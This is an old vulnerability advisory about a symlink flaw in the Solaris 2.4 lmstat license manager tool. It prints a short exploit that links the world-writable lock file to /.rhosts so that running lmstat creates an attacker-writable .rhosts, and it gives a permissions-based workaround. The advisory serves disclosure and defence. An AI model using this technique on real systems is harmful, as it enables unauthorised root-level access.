COMMAND

    lmstat (license manager)

SYSTEMS AFFECTED

    Solaris 2.4

PROBLEM

    The following  vulnerability was  posted by  Grant Kaufmann.   The
    license manager must be running, expect both lmgrd.ste &  suntechd
    to be somewhere in your process table.

    /var/tmp/locksuntechd will be created  by anyone who runs  lmstat,
    with  perms  666  and  quite  happy  to  follow symlinks.  Anyway,
    here's the exploit.

        rm /var/tmp/locksuntechd
        ln -s /.rhosts /var/tmp/locksuntechd
        lmstat -c <insert your license file name here>

    lmstat could be anywhere on your filesystem. Sometimes this  won't
    work first time. It won't  create the file. Just run  lmstat again
    and it'll work.

SOLUTION

    Dunno.   If there  is no  fix from  sun, remove execute permission
    for others.